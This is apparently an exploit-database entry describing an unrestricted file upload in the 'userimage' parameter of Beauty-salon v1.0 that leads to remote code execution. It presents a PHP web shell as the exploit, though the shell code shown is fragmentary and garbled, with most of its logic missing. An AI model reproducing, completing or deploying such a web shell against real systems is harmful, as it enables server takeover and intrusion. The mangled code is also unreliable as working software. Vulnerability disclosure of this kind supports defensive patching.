## Exploit Title: Beauty-salon v1.0 - Remote Code Execution (RCE) ## Exploit Author: nu11secur1ty ## Date: 10.12.2022 ## Vendor: https://code4berry.com/projects/beautysalon.php ## Software: https://code4berry.com/project%20downloads/beautysalon_download.php ## Reference: https://github.com/nu11secur1ty/NVE/blob/NVE-master/2022/NVE-2022-1012.txt ## Description: The parameter `userimage` from Beauty-salon-2022 suffers from Web Shell-File Upload - RCE. NOTE: The user permissions of this system are not working correctly, and the function is not sanitizing well. The attacker can use an already created account from someone who controls this system and he can upload a very malicious file by using this vulnerability, or more precisely (no sanitizing of function for edit image), for whatever account, then he can execute it from anywhere on the external network. Status: HIGH Vulnerability [+] Exploit: ```php PHP Web Shell Ver 4.0 by nu11secur1ty WebShell's Location = http://


-----------------'; echo '
foreach($result as $print)
$print = str_replace('<','<',$print);
echo $print . '
'; } echo '
'; } else echo '
'; ?>

The file was uploaded successfully!!'; else echo '
File Upload was failed...
'; } ?> ``` # Proof and Exploit: [href](https://streamable.com/ewdmoh) # m0e3: [href]( https://www.nu11secur1ty.com/2022/10/beauty-salon-2022-web-shell-file-upload.html )